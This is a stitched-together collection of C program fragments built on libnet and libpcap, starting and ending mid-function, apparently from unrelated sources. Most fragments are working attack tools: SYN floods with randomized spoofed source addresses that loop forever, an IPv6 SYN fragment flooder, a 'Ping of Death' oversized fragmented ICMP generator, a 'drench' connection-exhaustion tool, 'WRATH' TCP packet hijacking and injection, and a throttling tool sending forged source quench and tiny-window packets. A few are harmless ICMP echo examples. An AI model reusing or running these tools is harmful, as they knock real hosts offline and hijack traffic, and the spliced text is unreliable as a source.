/* end if */ } /* end while */ printf("Total source IPs: %d\n", js); fclose(srcf); jn = 0; printf("Reading dst IPs ... \n"); while ((jn < MAXLINES) && (fgets(lb, 80, nsf)!=0) ) { kd = 0; kn = 0; while (lb[kd] != '\0') { /* get rid of space and CR */ if ((lb[kd] != ' ') && (lb[kd] != '\n')) { linebuf[kn] = lb[kd]; kn++; } /* end if */ kd++; } /* end while */ linebuf[kn] = '\0'; if (kn != 0) { /* not empty line */ nss[jn] = (char *)malloc(strlen(linebuf)+1); strcpy(nss[jn++], linebuf); /* printf("%s\n", nss[jn-1]); */ } /* end if */ } /* end while */ printf("Total dst IPs: %d\n", jn); fclose(nsf); nround = 0; /* while(1) { non-stop sending ... */ /* Initialize the library. Root priviledges are required. */ l = libnet_init( LIBNET_RAW4, /* injection type */ NULL, /* network interface */ errbuf); /* errbuf */ if (l == NULL) { fprintf(stderr, "libnet_init() failed: %s\n", errbuf); exit(EXIT_FAILURE); } libnet_seed_prand(l); tcp = 0; ip = 0; for(kd=0; kd < jd; kd++) { /* loop over all http reqs */ for(kn=0; kn < jn; kn++) { /* loop over all dst IPs */ if ((dst_ip = libnet_name2addr4(l, nss[kn], LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Bad dest IP address: %s\n", nss[kn]); exit(EXIT_FAILURE); } /* end if */ /* printf("feeding %s for keyword %s ...\n", nss[kn], dms[kd]); */ i = (int)(libnet_get_prand(LIBNET_PRu16)/65535.0*(js-1)); /* Randsrc ip */ src_ip = libnet_name2addr4(l, srcs[i], LIBNET_RESOLVE); /* src ip */ printf("using source IP %s ...\n", srcs[i]); src_prt = libnet_get_prand(LIBNET_PRu16); /* Random source port */ dst_prt = 1234; /* http */ /* Building TCP */ tcp = libnet_build_tcp( src_prt, /* source port */ dst_prt, /* destination port */ libnet_get_prand(LIBNET_PRu32), libnet_get_prand(LIBNET_PRu32), 0x18, /* (PSH, ACK) */ libnet_get_prand(LIBNET_PRu16), /* window size */ 0, /* checksum */ 0, /* urgent pointer */ LIBNET_TCP_H + pay_s[kd], /* packet length */ dms[kd], /* payload */ pay_s[kd], /* payload size */ l, /* libnet handle */ tcp); /* libnet id */ if (tcp == -1) { fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l)); goto bad; } /* Building IP */ ip = libnet_build_ipv4( LIBNET_IPV4_H + pay_s[kd] + LIBNET_TCP_H, /* length */ 0x00, /* TOS */ 0, /* IP ID */ 0x4000, /* IP Frag */ 64, /* TTL */ IPPROTO_TCP, /* protocol */ 0, /* checksum */ src_ip, dst_ip, NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ ip); /* libnet id */ if (ip == -1) { fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l)); goto bad; } /* Write it to the wire. */ c = libnet_write(l); if (c == -1) { fprintf(stderr, "Write error: %s\n", libnet_geterror(l)); goto bad; } else { /* printf("Wrote %d byte TCP packet; check the wire.\n", c); */ } usleep(20); /* slow down to conserve bandwidth */ } /* end for */ } /* end for */ libnet_stats(l, &ls); fprintf(stderr, "Packets sent: %ld\n" "Packet errors: %ld\n" "Bytes written: %ld\n", ls.packets_sent, ls.packet_errors, ls.bytes_written); libnet_destroy(l); nround++; printf("====== Round %ld sent ================\n", nround); /* } end of while loop */ return (EXIT_SUCCESS); bad: libnet_destroy(l); return (EXIT_FAILURE); }
int main(int argc, char *argv[]) { pkt_t *dp = NULL; int ch = 0; u_int32_t count = 5; u_int32_t group = 0; /* number of packets to send in group */ useconds_t usec = 0; /* rate limit number of SYN's sent */ pid_t pid = 0; /* pcap */ pcap_t *p = NULL; char *dev = NULL; char errbuf[PCAP_ERRBUF_SIZE]; u_int32_t localnet = 0; u_int32_t netmask = 0; struct bpf_program fcode; char *filt = NULL; /* libnet */ char lerrbuf[LIBNET_ERRBUF_SIZE]; (void)memset(errbuf, 0, PCAP_ERRBUF_SIZE); (void)memset(lerrbuf, 0, LIBNET_ERRBUF_SIZE); ISNULL(filt = (char *)calloc(MAXFILT, 1)); ISNULL(dp = (pkt_t *)calloc(1, sizeof(pkt_t))); dp->p_tcp = LIBNET_PTAG_INITIALIZER; dp->p_ip = LIBNET_PTAG_INITIALIZER; dp->winsize = TCP_WINSIZE; dp->opts |= O_CHKISN; /* check the ISN return in the ACK by default */ drench_exit = 0; /* global, signal exit from loop */ while ( (ch = getopt(argc, argv, "ACc:d:hi:p:P:Rr:s:S:x:")) != EOF) { switch (ch) { case 'A': /* Continue ACK'ing all ACK's */ dp->opts |= O_ACK; break; case 'C': /* Don't check the returned sequence number in the ACK */ dp->opts ^= O_CHKISN; break; case 'c': /* Number of packets to send */ count = (u_int32_t)atoi(optarg); break; case 'd': /* Destination address */ dp->daddr = optarg; break; case 'h': /* Help */ usage(); break; case 'i': /* Use interface */ dev = optarg; break; case 'p': /* Destination port */ dp->dport = (in_port_t)atoi(optarg); break; case 'P': dp->payload = optarg; /* Send data with the ACK */ break; case 'r': /* Range of ip's to allocate */ dp->range = (u_int8_t)atoi(optarg); break; case 'R': /* Repeat the scan */ dp->opts |= O_REPEAT; break; case 's': /* Source address */ dp->saddr = strdup(optarg); break; case 'S': /* Sleep (microseconds) */ usec = (useconds_t)atoi(optarg); break; case 'x': /* Number of packets to send in group */ group = (u_int32_t)atoi(optarg); break; default: usage(); break; } } if (dp->daddr == NULL) { (void)fprintf(stderr, "Must specify destination address.\n"); usage(); } if (dp->dport == 0) { (void)fprintf(stderr, "Must specify destination port.\n"); usage(); } if (dp->range == 0) dp->range = 1; if (group == 0) group = dp->range; if (dev == NULL) PCAP_ERRBUF(dev = pcap_lookupdev(errbuf)); /* libnet */ dp->l = libnet_init(LIBNET_RAW4, dev, lerrbuf); if (dp->l == NULL) errx(EXIT_FAILURE, "libnet_init: %s", lerrbuf); if (dp->saddr == NULL) { u_int32_t ipaddr = 0; /* Assign the inital address. */ /* FIXME Simplisitically assign the address from * FIXME our current address. Note this breaks for many * FIXME conditions: if the host is multi-homed, if * FIXME another host exists on the network with that IP, * FIXME if the final octet rolls past 254, if the network * FIXME is classless, IP aliases ... * * FIXME We can check for these conditions (check the ARP * FIXME table, etc), but it is error prone. So just * FIXME warn the user and hope for the best. */ if ( (ipaddr = libnet_get_ipaddr4(dp->l)) == -1) errx(EXIT_FAILURE, "%s", libnet_geterror(dp->l)); dp->saddr = strdup(libnet_addr2name4(ipaddr, LIBNET_DONT_RESOLVE)); (void)fprintf(stdout, "[%s] WARNING: Source address not assigned.\n", __progname); } if (dp->range > 1) { (void)fprintf(stdout, "[%s] WARNING: Assigning addresses sequentially from %s.\n", __progname, dp->saddr); (void)fprintf(stdout, "[%s] WARNING: This may cause problems on your network if addresses conflict with other hosts!\n", __progname); } LIBNET_ERR(libnet_seed_prand(dp->l)); dp->secret = libnet_get_prand(LIBNET_PRu32); /* pcap */ (void)fprintf(stdout, "[%s] Connection exhaustion started.\n", __progname); (void)fprintf(stdout, "[%s] Using device: %s\n", __progname, dev); (void)snprintf(filt, MAXFILT, PCAP_FILT, dp->daddr, dp->dport); (void)fprintf(stdout, "[%s] Using filter: %s\n", __progname, filt); PCAP_ERRBUF(p = pcap_open_live(dev, SNAPLEN, PROMISC, TIMEOUT, errbuf)); if (pcap_lookupnet(dev, &localnet, &netmask, errbuf) == -1) errx(EXIT_FAILURE, "%s\n", errbuf); PCAP_ERR(pcap_compile(p, &fcode, filt, 1 /* optimize == true */, netmask)); PCAP_ERR(pcap_setfilter(p, &fcode)); switch (pcap_datalink(p)) { case DLT_IEEE802_11: (void)fprintf(stderr, "[%s] Link layer is 802.11\n", __progname); break; case DLT_EN10MB: (void)fprintf(stderr, "[%s] Link layer is ethernet\n", __progname); break; default: (void)fprintf(stderr, "[%s] Link layer is unsupported\n", __progname); break; } if (create_arp_pool1(dp) < 0) warnx("Could not create ARP pool"); (void)signal(SIGHUP, drench_cleanup); (void)signal(SIGQUIT, drench_cleanup); (void)signal(SIGINT, drench_cleanup); (void)signal(SIGTERM, drench_cleanup); if ( (pid = fork()) == -1) err(EXIT_FAILURE, "fork"); /* begin by sending SYN packets */ if (pid == 0) drench_writer(dp, count, group, usec); drench_reader(dp, p); (void)destroy_arp_pool1(dp); libnet_destroy(dp->l); free(dp->saddr); free(dp); exit (EXIT_FAILURE); }
int main(int argc, char **argv) { libnet_t *l; libnet_ptag_t ip; libnet_ptag_t icmp; struct libnet_stats ls; u_long fakesrc, target; u_char *data; int c, i, flags, offset, len; char errbuf[LIBNET_ERRBUF_SIZE]; printf("libnet 1.1 Ping of Death[raw]\n"); /* * Initialize the library. Root priviledges are required. */ l = libnet_init( LIBNET_RAW4, /* injection type */ NULL, /* network interface */ errbuf); /* errbuf */ if (l == NULL) { fprintf(stderr, "libnet_init() failed: %s\n", errbuf); exit(EXIT_FAILURE); } if (argc != 2 || ((target = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE) == -1))) { fprintf(stderr, "Usage: %s <target>\n", argv[0]); exit(EXIT_FAILURE); } /* get random src addr. */ libnet_seed_prand(l); fakesrc = libnet_get_prand(LIBNET_PRu32); data = malloc(FRAG_LEN); for (i = 0 ; i < FRAG_LEN ; i++) { /* fill it with something */ data[i] = 0x3a; } ip = LIBNET_PTAG_INITIALIZER; icmp = LIBNET_PTAG_INITIALIZER; for (i = 0 ; i < 65536 ; i += (LIBNET_ICMPV4_ECHO_H + FRAG_LEN)) { offset = i; flags = 0; if (offset < 65120) { flags = IP_MF; len = FRAG_LEN; } else { /* for a total reconstructed length of 65538 bytes */ len = 410; } icmp = libnet_build_icmpv4_echo( ICMP_ECHO, /* type */ 0, /* code */ 0, /* checksum */ 666, /* id */ 666, /* sequence */ data, /* payload */ len, /* payload size */ l, /* libnet handle */ icmp); /* libnet ptag */ if (icmp == -1) { fprintf(stderr, "Can't build ICMP header: %s\n", libnet_geterror(l)); goto bad; } /* no reason to do this */ libnet_toggle_checksum(l, icmp, 0); ip = libnet_build_ipv4( LIBNET_IPV4_H + LIBNET_ICMPV4_ECHO_H + len, /* length */ 0, /* TOS */ 666, /* IP ID */ flags | (offset >> 3), /* IP Frag */ 64, /* TTL */ IPPROTO_ICMP, /* protocol */ 0, /* checksum */ fakesrc, /* source IP */ target, /* destination IP */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ ip); /* libnet ptag */ if (ip == -1) { fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l)); goto bad; } c = libnet_write(l); if (c == -1) { fprintf(stderr, "Write error: %s\n", libnet_geterror(l)); } /* tcpdump-style jonks. */ printf("%s > %s: (frag 666:%d@%d%s)\n", libnet_addr2name4(fakesrc,0), argv[1], LIBNET_ICMPV4_ECHO_H + len, offset, flags ? "+" : ""); } libnet_stats(l, &ls); fprintf(stderr, "Packets sent: %lld\n" "Packet errors: %lld\n" "Bytes written: %lld\n", ls.packets_sent, ls.packet_errors, ls.bytes_written); libnet_destroy(l); free(data); return (EXIT_SUCCESS); bad: libnet_destroy(l); free(data); return (EXIT_FAILURE); }
int main() { libnet_t *l; /* libnet context */ char errbuf[LIBNET_ERRBUF_SIZE], ip_addr_str[16]; u_int32_t ip_addr; libnet_ptag_t icmp_tag, ip_tag; u_int16_t id, seq; int i; l = libnet_init(LIBNET_RAW4, NULL, errbuf); if ( l == NULL ) { fprintf(stderr, "libnet_init() failed: %s\n", errbuf); exit(EXIT_FAILURE); } icmp_tag = ip_tag = LIBNET_PTAG_INITIALIZER; /* Generating a random id */ libnet_seed_prand(l); id = (u_int16_t)libnet_get_prand(LIBNET_PR16); /* Getting destination IP address */ printf("Destination IP address: "); scanf("%15s",ip_addr_str); ip_addr = libnet_name2addr4(l, ip_addr_str, LIBNET_DONT_RESOLVE); if ( ip_addr == -1 ) { fprintf(stderr, "Error converting IP address.\n"); libnet_destroy(l); exit(EXIT_FAILURE); } /* Building ICMP header */ seq = 1; icmp_tag = libnet_build_icmpv4_echo(ICMP_ECHO, 0, 0, id, seq, NULL,\ 0, l, 0); if (icmp_tag == -1) { fprintf(stderr, "Error building ICMP header: %s\n",\ libnet_geterror(l)); libnet_destroy(l); exit(EXIT_FAILURE); } /* Building IP header */ ip_tag = libnet_autobuild_ipv4(LIBNET_IPV4_H + LIBNET_ICMPV4_ECHO_H,\ IPPROTO_ICMP, ip_addr, l); if (ip_tag == -1) { fprintf(stderr, "Error building IP header: %s\n",\ libnet_geterror(l)); libnet_destroy(l); exit(EXIT_FAILURE); } /* Writing 4 packets */ for ( i = 0; i < 4; i++ ) { /* Updating the ICMP header */ icmp_tag = libnet_build_icmpv4_echo(ICMP_ECHO, 0, 0, id,\ (seq + i), NULL, 0, l, icmp_tag); if (icmp_tag == -1) { fprintf(stderr, "Error building ICMP header: %s\n",\ libnet_geterror(l)); libnet_destroy(l); exit(EXIT_FAILURE); } if ( libnet_write(l) == -1 ) fprintf(stderr, "Error writing packet: %s\n",\ libnet_geterror(l)); /* Waiting 1 second between each packet */ sleep(1); } libnet_destroy(l); return 0; }
int main(int argc, char *argv[]) { libnet_t *libnet_context; u_long dest_ip; u_short dest_port; u_char errbuf[LIBNET_ERRBUF_SIZE]; int opt, byte_count, packet_size = LIBNET_IPV4_H + LIBNET_TCP_H; if(argc < 3) { printf("Usage:\n%s\t <target host> <target port>\n", argv[0]); exit(1); } libnet_context = libnet_init(LIBNET_RAW4, NULL, errbuf); // Init libnet context if ( libnet_context == NULL ) { fprintf(stderr, "libnet_init() failed: %s\n", errbuf); exit(EXIT_FAILURE); } dest_ip = libnet_name2addr4(libnet_context, argv[1], LIBNET_RESOLVE); // the host dest_port = (u_short) atoi(argv[2]); // the port libnet_seed_prand(libnet_context); // seed the random number generator printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip)); while(1) // loop forever (until break by CTRL-C) { libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // source TCP port (random) dest_port, // destination TCP port libnet_get_prand(LIBNET_PRu32), // sequence number (randomized) libnet_get_prand(LIBNET_PRu32), // acknowledgement number (randomized) TH_SYN, // control flags (SYN flag set only) libnet_get_prand(LIBNET_PRu16), // window size (randomized) 0, // checksum (0 autofill) 0, // urgent pointer LIBNET_TCP_H, // tcp packet length NULL, // payload (none) 0, // payload length libnet_context, // context 0); // ptag libnet_build_ipv4(LIBNET_IPV4_H + LIBNET_TCP_H, // size of the packet sans IP header IPTOS_LOWDELAY, // IP tos libnet_get_prand(LIBNET_PRu16), // IP ID (randomized) 0, // frag stuff libnet_get_prand(LIBNET_PR8), // TTL (randomized) IPPROTO_TCP, // transport protocol 0, // checksum libnet_get_prand(LIBNET_PRu32), // source IP (randomized) dest_ip, // destination IP NULL, // payload (none) 0, // payload length libnet_context, // libnet context 0); // ptag byte_count = libnet_write(libnet_context); // inject packet if ( byte_count != -1 ) printf("%d bytes written.\n", byte_count); else fprintf(stderr, "Error writing packet: %s\n",\ libnet_geterror(libnet_context)); libnet_clear_packet(libnet_context); // clear packet usleep(FLOOD_DELAY); // wait for FLOOD_DELAY milliseconds } libnet_destroy(libnet_context); // free packet memory return 0; }
int main(int argc, char **argv) { struct libnet_in6_addr dst_ip; struct libnet_in6_addr src_ip; u_short dst_prt = 0; u_short src_prt = 0; libnet_t *l; libnet_ptag_t tcp, ip, ip_frag; u_char *cp; char errbuf[LIBNET_ERRBUF_SIZE]; int i, j, c, packet_amt, burst_int, burst_amt; char srcname[100], dstname[100]; u_int8_t payload[56]; packet_amt = 0; burst_int = 0; burst_amt = 1; tcp = ip_frag = ip = LIBNET_PTAG_INITIALIZER; printf("libnet 1.1 syn flooding: TCP IPv6 fragments [raw]\n"); l = libnet_init( LIBNET_RAW6, /* injection type */ NULL, /* network interface */ errbuf); /* error buffer */ if (l == NULL) { fprintf(stderr, "libnet_init() failed: %s", errbuf); exit(EXIT_FAILURE); } while((c = getopt(argc, argv, "t:a:i:b:")) != EOF) { switch (c) { case 't': if (!(cp = strrchr(optarg, '/'))) { usage(argv[0]); exit(EXIT_FAILURE); } *cp++ = 0; dst_prt = (u_short)atoi(cp); dst_ip = libnet_name2addr6(l, optarg, 1); if (strncmp((char*)&dst_ip, (char*)&in6addr_error,sizeof(in6addr_error))==0) { fprintf(stderr, "Bad IPv6 address: %s\n", optarg); exit(EXIT_FAILURE); } break; case 'a': packet_amt = atoi(optarg); break; case 'i': burst_int = atoi(optarg); break; case 'b': burst_amt = atoi(optarg); break; default: usage(argv[0]); exit(EXIT_FAILURE); } } src_ip = libnet_name2addr6(l, "0:0:0:0:0:0:0:1", LIBNET_DONT_RESOLVE); /* src_ip = libnet_name2addr6(l, "3ffe:400:60:4d:250:fcff:fe2c:a9cd", LIBNET_DONT_RESOLVE); dst_prt = 113; dst_ip = libnet_name2addr6(l, "nathan.ip6.uni-ulm.de", LIBNET_RESOLVE); packet_amt = 1; */ if (!dst_prt || strncmp((char*)&dst_ip, (char*)&in6addr_error,sizeof(in6addr_error))==0 || !packet_amt) { usage(argv[0]); exit(EXIT_FAILURE); } libnet_seed_prand(l); libnet_addr2name6_r(src_ip, LIBNET_RESOLVE, srcname, sizeof(srcname)); libnet_addr2name6_r(dst_ip, LIBNET_RESOLVE, dstname, sizeof(dstname)); for(; burst_amt--;) { for (i = 0; i < packet_amt; i++) { for (j = 0; j < 56; j++) payload[j] = 'A' + ((char)(j % 26)); tcp = libnet_build_tcp( src_prt = libnet_get_prand(LIBNET_PRu16), dst_prt, libnet_get_prand(LIBNET_PRu32), libnet_get_prand(LIBNET_PRu32), TH_SYN, libnet_get_prand(LIBNET_PRu16), 0, 0, LIBNET_TCP_H, NULL, 0, l, tcp); if (tcp == -1) { fprintf(stderr, "Can't build or modify TCP header: %s\n", libnet_geterror(l)); return (EXIT_FAILURE); } ip_frag = libnet_build_ipv6_frag( IPPROTO_TCP, /* next header */ 0, /* reserved */ 0, /* frag bits */ 1, /* ip id */ NULL, 0, l, ip_frag); if (ip_frag == -1) { fprintf(stderr, "Can't build or modify TCP header: %s\n", libnet_geterror(l)); return (EXIT_FAILURE); } ip = libnet_build_ipv6( 0, 0, LIBNET_TCP_H, IPPROTO_TCP, 64, src_ip, dst_ip, NULL, 0, l, ip); if (ip == -1) { fprintf(stderr, "Can't build or modify TCP header: %s\n", libnet_geterror(l)); return (EXIT_FAILURE); } printf("%15s/%5d -> %15s/%5d\n", srcname, ntohs(src_prt), dstname, dst_prt); c = libnet_write(l); if (c == -1) { fprintf(stderr, "libnet_write: %s\n", libnet_geterror(l)); } #if !(__WIN32__) usleep(250); #else Sleep(250); #endif } #if !(__WIN32__) sleep(burst_int); #else Sleep(burst_int * 1000); #endif } exit(EXIT_SUCCESS); }
void wrath_observe() { char libnet_errbuf[LIBNET_ERRBUF_SIZE]; char pcap_errbuf[PCAP_ERRBUF_SIZE]; char *device; /* initializing bundle */ chp = (struct lcp_package *) malloc(sizeof (struct lcp_package)); memset(chp, 0x00, sizeof(struct lcp_package)); chp->cline_args = user_values; /* initializing sniffer, getting into position */ pcap_handle = wrath_position(user_values); /* grabbing device name for libnet */ if (strcmp(user_values->interface, "\0") == 0) { // if interface is not set device = pcap_lookupdev(pcap_errbuf); if(device == NULL) { fprintf(stderr, "error fetching interface: %s %s\n", pcap_errbuf, "(this program must be run as root)"); exit(1); } } else { // if interface is set device = user_values->interface; } // initializing environment for libent in advanced mode libnet_handle = libnet_init(LIBNET_RAW4_ADV, device, libnet_errbuf); if (libnet_handle == NULL) { fprintf(stderr, "trouble initiating libnet interface: %s \n", libnet_errbuf); exit(1); } chp->libnet_handle = libnet_handle; // finding payload int length; char *app_cmd = "\0"; if (strcmp(user_values->input_file, "\0") != 0) { // If an input file has been specified int app_fd; app_fd = open(user_values->input_file, O_RDONLY, 0); if ((length = file_size(app_fd)) == -1) fatal_error("getting file size"); app_cmd = (char *) safe_malloc(length); read(app_fd, app_cmd, length-1); app_cmd[length-1] = '\0'; } else if (!strcmp(user_values->command, "\0") != 0) { // If a command has been specified but not an input file length = strlen(user_values->command); app_cmd = (unsigned char *) safe_malloc(length); strcpy(app_cmd, user_values->command); app_cmd[length-1] = '\0'; } // finding and setting up logfile if ((strcmp(user_values->logfile, "\0"))) { fp = fopen(user_values->logfile, "w"); openned = 1; chp->logfile = fp; } // converting and setting payload char *app_cmd_con = (char *) malloc(strlen(app_cmd)); if (strcmp(app_cmd, "\0") != 0) { // if a payload was found wrath_char_encode(app_cmd, app_cmd_con); free(app_cmd); chp->payload = app_cmd_con; } else { chp->payload = "\0"; } printf("Starting WRATH ...\n"); printf("Hijacking specified packets with ... \n"); //printf("Payload:\n%s\n", chp->payload); printf("-----BEGINNING-OF-PAYLOAD-----\n"); printf("%s",chp->payload); printf("\n--------END-OF-PAYLOAD--------\n"); if (openned) { fprintf(fp, "Starting WRATH ...\n"); fprintf(fp, "Hijacking specified packets with ... \n"); fprintf(fp, "Payload:\n%s\n", chp->payload); fprintf(fp, "-----BEGINNING-OF-PAYLOAD-----\n"); fprintf(fp, chp->payload); fprintf(fp, "\n--------END-OF-PAYLOAD--------\n"); } // seeding psuedorandom number generator libnet_seed_prand(libnet_handle); int cap_amount = -1; if (user_values->count != 0) // if count is set cap_amount = user_values->count; pcap_loop(pcap_handle, cap_amount, wrath_inject, (u_char *) chp); pcap_close(pcap_handle); // getting statistical information struct libnet_stats l_stats; libnet_stats(libnet_handle, &l_stats); printf("Wrath Stats: \n"); printf("Packets Injected: %d\n", l_stats.packets_sent); if (openned) fclose(fp); libnet_destroy(libnet_handle); free(app_cmd_con); free(chp); }
int main(int argc, char *argv[]) { int n; char errbuf[LIBNET_ERRBUF_SIZE]; /* pcap variables */ char perrbuf[PCAP_ERRBUF_SIZE]; char *dev ="eth0"; /* default if */ char filter[MAXTEXT]; u_short sport; /* remote port from which syn-ack is coming */ struct bpf_program fp; /* hold compiled program */ bpf_u_int32 maskp; /* subnet mask */ bpf_u_int32 netp; /* ip */ void usage(char *); /* Initialize the library. Root priviledges are required. */ l = libnet_init( LIBNET_RAW4, /* injection type */ NULL, /* network interface */ errbuf); /* errbuf */ if (l == NULL) { fprintf(stderr, "libnet_init() failed: %s\n", errbuf); exit(EXIT_FAILURE); } libnet_seed_prand(l); tcp = 0; ip = 0; if (argc != 5) { usage(argv[0]); exit(EXIT_FAILURE); } while ((n = getopt(argc, argv, "p:i:")) != EOF) { switch (n) { case 'p': sport = (u_short) atoi(optarg); /* local port */ break; case 'i': dev = optarg; /* device */ break; default: usage(argv[0]); exit(EXIT_FAILURE); } } pcap_lookupnet(dev,&netp,&maskp,perrbuf); /* open device for reading in promiscuous mode */ descr = pcap_open_live(dev,BUFSIZ,1,-1,perrbuf); if(descr == NULL) { printf("pcap_open_live(): %s\n",perrbuf); exit(1); } /* Lets try and compile the program.. non-optimized */ sprintf(filter, "src port %d and tcp[13] == 18", sport); /* only SYN-ACK */ /* printf("The filter is: %s\n", filter); */ if(pcap_compile(descr,&fp,filter,0,netp) == -1) { fprintf(stderr,"Error calling pcap_compile\n"); exit(1); } /* set the compiled program as the filter */ if(pcap_setfilter(descr,&fp) == -1) { fprintf(stderr,"Error setting filter\n"); exit(1); } pcap_loop(descr,-1,my_callback,NULL); pcap_close(descr); libnet_destroy(l); return (EXIT_SUCCESS); }
void tcp_nice_loop(pcap_t *pd, int sock) { struct pcap_pkthdr pkthdr; struct libnet_ip_hdr *ip; struct libnet_tcp_hdr *tcp; struct libnet_icmp_hdr *icmp; u_char *pkt, buf[IP_H + ICMP_ECHO_H + 128]; int len, nice; libnet_seed_prand(); nice = 160 / Opt_nice; for (;;) { if ((pkt = (char *)pcap_next(pd, &pkthdr)) != NULL) { ip = (struct libnet_ip_hdr *)(pkt + pcap_off); if (ip->ip_p != IPPROTO_TCP) continue; tcp = (struct libnet_tcp_hdr *) ((u_char *)ip + (ip->ip_hl * 4)); if (tcp->th_flags & (TH_SYN|TH_FIN|TH_RST) || ntohs(tcp->th_win) == nice) continue; if (Opt_icmp) { /* Send ICMP source quench. */ len = (ip->ip_hl * 4) + 8; libnet_build_ip(ICMP_ECHO_H + len, 0, libnet_get_prand(PRu16), 0, 64, IPPROTO_ICMP, ip->ip_dst.s_addr, ip->ip_src.s_addr, NULL, 0, buf); icmp = (struct libnet_icmp_hdr *)(buf + IP_H); icmp->icmp_type = 4; icmp->icmp_code = 0; memcpy((u_char *)icmp + ICMP_ECHO_H, (u_char *)ip, len); libnet_do_checksum(buf, IPPROTO_ICMP, ICMP_ECHO_H + len); len += (IP_H + ICMP_ECHO_H); if (libnet_write_ip(sock, buf, len) != len) warn("write"); fprintf(stderr, "%s > %s: icmp: source quench\n", libnet_host_lookup(ip->ip_dst.s_addr, 0), libnet_host_lookup(ip->ip_src.s_addr, 0)); } /* Send tiny window advertisement. */ ip->ip_hl = 5; ip->ip_len = htons(IP_H + TCP_H); ip->ip_id = libnet_get_prand(PRu16); memcpy(buf, (u_char *)ip, IP_H); tcp->th_off = 5; tcp->th_win = htons(nice); memcpy(buf + IP_H, (u_char *)tcp, TCP_H); libnet_do_checksum(buf, IPPROTO_TCP, TCP_H); len = IP_H + TCP_H; if (libnet_write_ip(sock, buf, len) != len) warn("write"); fprintf(stderr, "%s:%d > %s:%d: . ack %u win %d\n", libnet_host_lookup(ip->ip_src.s_addr, 0), ntohs(tcp->th_sport), libnet_host_lookup(ip->ip_dst.s_addr, 0), ntohs(tcp->th_dport), ntohl(tcp->th_ack), nice); } } }
int main() { libnet_t *handle; char errbuf[LIBNET_ERRBUF_SIZE],ip_addr_str[16]; u_int32_t ip_addr; u_int16_t id,seq; char payload[] = "libnet :D"; int bytes_written; handle = libnet_init(LIBNET_RAW4,NULL,errbuf); if(handle == NULL) { fprintf(stderr,"libnet_init() failed: %s\n",errbuf); exit(EXIT_FAILURE); } libnet_seed_prand(handle); id = (u_int16_t)libnet_get_prand(LIBNET_PR16); printf("Destination IP address: "); scanf("%15s",ip_addr_str); ip_addr = libnet_name2addr4(handle,ip_addr_str,LIBNET_DONT_RESOLVE); if(ip_addr == -1) { fprintf(stderr,"Error converting IP address.\n"); libnet_destroy(handle); exit(EXIT_FAILURE); } seq = 1; if(libnet_build_icmpv4_echo(ICMP_ECHO,0,0,id,seq,\ (u_int8_t *)payload,sizeof(payload),handle,0)==-1) { fprintf(stderr,"Error building ICMP header: %s\n",\ libnet_geterror(handle)); libnet_destroy(handle); exit(EXIT_FAILURE); } if(libnet_autobuild_ipv4(LIBNET_IPV4_H + \ LIBNET_ICMPV4_ECHO_H + sizeof(payload),\ IPPROTO_ICMP,ip_addr,handle) == -1) { fprintf(stderr,"Error building IP header: %s\n",\ libnet_geterror(handle)); libnet_destroy(handle); exit(EXIT_FAILURE); } bytes_written = libnet_write(handle); if(bytes_written != -1) printf("%d bytes written.\n",bytes_written); else fprintf(stderr,"Error writing packet: %s\n",\ libnet_geterror(handle)); libnet_destroy(handle); return 0; }
int main() { libnet_t *l; /* libnet context */ char errbuf[LIBNET_ERRBUF_SIZE], ip_addr_str[16]; u_int32_t ip_addr; u_int16_t id, seq; int i; l = libnet_init(LIBNET_RAW4, NULL, errbuf); if ( l == NULL ) { fprintf(stderr, "libnet_init() failed: %s\n", errbuf); exit(EXIT_FAILURE); } /* Generating a random id */ libnet_seed_prand(l); id = (u_int16_t)libnet_get_prand(LIBNET_PR16); /* Getting destination IP address */ printf("Destination IP address: "); scanf("%15s",ip_addr_str); ip_addr = libnet_name2addr4(l, ip_addr_str, LIBNET_DONT_RESOLVE); if ( ip_addr == -1 ) { fprintf(stderr, "Error converting IP address.\n"); libnet_destroy(l); exit(EXIT_FAILURE); } /* Writing 4 packets */ seq = 1; for ( i = 0; i < 4; i++ ) { /* Building the ICMP header */ if ( libnet_build_icmpv4_echo(ICMP_ECHO, 0, 0, id,\ (seq + i), NULL, 0, l, 0) == -1 ) { fprintf(stderr, "Error building ICMP header: %s\n",\ libnet_geterror(l)); libnet_destroy(l); exit(EXIT_FAILURE); } /* Building the IP header */ if ( libnet_autobuild_ipv4(LIBNET_IPV4_H + \ LIBNET_ICMPV4_ECHO_H, IPPROTO_ICMP,\ ip_addr, l) == -1 ) { fprintf(stderr, "Error building IP header: %s\n",\ libnet_geterror(l)); libnet_destroy(l); exit(EXIT_FAILURE); } if ( libnet_write(l) == -1 ) fprintf(stderr, "Error writing packet: %s\n",\ libnet_geterror(l)); /* Clearing the packet */ /* Comment this to see what happens when you rebuild headers * without calling libnet_clear_packet() */ libnet_clear_packet(l); /* Waiting 1 second between each packet */ sleep(1); } libnet_destroy(l); return 0; }
int main(int argc, char *argv[]) { u_long dest_ip; u_short dest_port; u_char errbuf[LIBNET_ERRBUF_SIZE], *packet; int opt, network, byte_count, packet_size = LIBNET_IP_H + LIBNET_TCP_H; if(argc < 3) { printf("Usage:\n%s\t <target host> <target port>\n", argv[0]); exit(1); } dest_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE); // the host dest_port = (u_short) atoi(argv[2]); // the port network = libnet_open_raw_sock(IPPROTO_RAW); // open network interface if (network == -1) libnet_error(LIBNET_ERR_FATAL, "can't open network interface. -- this program must run as root.\n"); libnet_init_packet(packet_size, &packet); // allocate memory for packet if (packet == NULL) libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory.\n"); libnet_seed_prand(); // seed the random number generator printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip)); while(1) // loop forever (until break by CTRL-C) { libnet_build_ip(LIBNET_TCP_H, // size of the packet sans IP header IPTOS_LOWDELAY, // IP tos libnet_get_prand(LIBNET_PRu16), // IP ID (randomized) 0, // frag stuff libnet_get_prand(LIBNET_PR8), // TTL (randomized) IPPROTO_TCP, // transport protocol libnet_get_prand(LIBNET_PRu32), // source IP (randomized) dest_ip, // destination IP NULL, // payload (none) 0, // payload length packet); // packet header memory 